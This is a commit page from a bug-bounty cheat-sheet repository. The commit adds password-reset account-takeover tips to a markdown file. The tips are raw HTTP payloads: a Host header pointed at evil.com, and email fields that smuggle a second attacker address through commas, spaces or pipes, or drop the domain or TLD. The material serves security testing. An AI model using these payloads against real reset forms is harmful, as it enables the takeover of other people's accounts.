ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Account Takover [2]

Browse Source 
Add 3 tips
This commit is contained in:
Muhammad Daffa 2020-09-03 21:04:19 +07:00 committed by GitHub
parent 4e7af26eb2
commit 35198d15d7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
AccountTakeover.md
View File

@ -21,4 +21,35 @@ Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with your evil.com
And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter
```
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```
5. No domain in value of the paramter
```
POST /reset
[...]
email=victim
```
6. No TLD in value of the paramter
```
POST /reset
[...]
email=victim@mail
```